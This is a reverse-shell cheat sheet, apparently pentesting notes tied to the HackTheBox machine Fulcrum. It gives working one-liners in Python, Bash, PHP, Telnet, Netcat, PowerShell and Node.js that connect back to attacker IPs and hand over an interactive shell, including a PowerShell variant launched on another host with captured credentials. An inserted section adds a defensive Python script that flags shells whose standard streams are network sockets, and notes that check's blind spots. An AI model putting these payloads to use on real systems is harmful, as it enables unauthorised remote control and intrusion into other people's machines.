Reverse Shells

Python

```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.175",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

Bash

```bash
/bin/bash -c 'bash -i >& /dev/tcp/<attacker_IP>/<attacker_PORT> 0>&1'
```

PHP

```php
# Example 1
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1'");?>
# Example 2
php -r '$sock=fsockopen("<attacker_IP>",<attacker_PORT>); exec("/bin/sh -i <&3 >&3 2>&3");'
```

Example: Fulcrum

Telnet

```bash
telnet <attacker_IP> 4444 | /bin/bash | telnet <attacker_IP> 4445
```

Netcat

```bash
nc <attacker_IP> <attacker_PORT> -e /bin/sh
```

Netcat without the "-e" option

```bash
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attacker_IP> <attacker_PORT> > /tmp/f
```
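A defender-side check for the Linux payloads above, added here as an example rather than code from the original post. The Python (os.dup2), Bash (/dev/tcp), PHP example 1 and `nc -e` one-liners all leave `/bin/sh` or `bash` running with file descriptors 0, 1 and 2 pointing at the TCP socket, which Linux exposes as `/proc/<pid>/fd/N -> socket:[<inode>]`; a normal interactive shell points at a tty and a service-spawned shell at pipes. The `SHELLS` set and the `SAMPLE_PROCESSES` table are assumptions constructed for this example, not captured from a real host.

```python
"""Flag shell processes whose standard streams are a network socket."""
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Binaries we treat as "a shell" (assumed list; extend for your fleet).
SHELLS = {"sh", "bash", "dash", "ash", "zsh", "ksh"}
SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")


@dataclass
class Finding:
    pid: int
    comm: str
    socket_fds: Tuple[int, ...]  # which of fd 0, 1, 2 resolve to a socket


def classify(pid: int, comm: str, fd_links: Dict[int, str]) -> Optional[Finding]:
    """fd_links maps fd number -> readlink() target, as found under /proc/<pid>/fd."""
    if comm not in SHELLS:
        return None
    hits = tuple(fd for fd in (0, 1, 2) if SOCKET_LINK.match(fd_links.get(fd, "")))
    return Finding(pid, comm, hits) if hits else None


def scan_proc(proc_root: str = "/proc") -> List[Finding]:
    """Walk a live procfs; reading other users' fd links needs root."""
    findings: List[Finding] = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"{proc_root}/{pid}/comm") as fh:
                comm = fh.read().strip()
        except OSError:
            continue  # process exited or is not readable
        links: Dict[int, str] = {}
        for fd in (0, 1, 2):
            try:
                links[fd] = os.readlink(f"{proc_root}/{pid}/fd/{fd}")
            except OSError:
                pass  # fd closed or permission denied
        finding = classify(pid, comm, links)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample, not captured from a real host: (pid, comm, {fd: link target}).
SAMPLE_PROCESSES = [
    (4242, "sh", {0: "socket:[39185]", 1: "socket:[39185]", 2: "socket:[39185]"}),  # dup2 / nc -e shell
    (1001, "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),  # interactive login shell
    (1337, "sh", {0: "/tmp/f", 1: "pipe:[2201]", 2: "pipe:[2201]"}),  # mkfifo variant: fds are a fifo and a pipe
    (2020, "python3", {0: "socket:[1000]", 1: "socket:[1000]", 2: "socket:[1000]"}),  # not a shell binary
]


def scan_samples(samples=SAMPLE_PROCESSES) -> List[Finding]:
    """Run classify() over the constructed table; only pid 4242 should be flagged."""
    return [f for f in (classify(*s) for s in samples) if f]


if __name__ == "__main__":
    live = scan_proc() if os.path.isdir("/proc") else []
    for f in scan_samples() + live:
        print(f"pid={f.pid} comm={f.comm} socket fds={f.socket_fds}")
```

The constructed table shows the check's blind spot: the `mkfifo` variant gives the shell a fifo and a pipe (the socket belongs to `nc`), and the Node.js payload below spawns `/bin/sh` over pipes, so neither trips this rule. Pair it with a command-line based check and with egress monitoring for unexpected outbound connections from web or service accounts.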

PowerShell

From a non-PowerShell command line, we can launch the reverse shell with this command:

```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('10.10.16.3',2345);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

If we are already in a PowerShell session, we can run this one instead (here the payload is executed on a remote host through Invoke-Command):

```powershell
Invoke-Command -ComputerName file.fulcrum.local -Credential $Creds -ScriptBlock { $client = New-Object System.Net.Sockets.TCPClient('10.10.16.3',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }
```

Examples: Fulcrum

Node.js

```javascript
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(443, "10.10.14.2", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
```

Firefox Plugin

An excellent plugin for crafting reverse shell payloads directly from Firefox: HackTools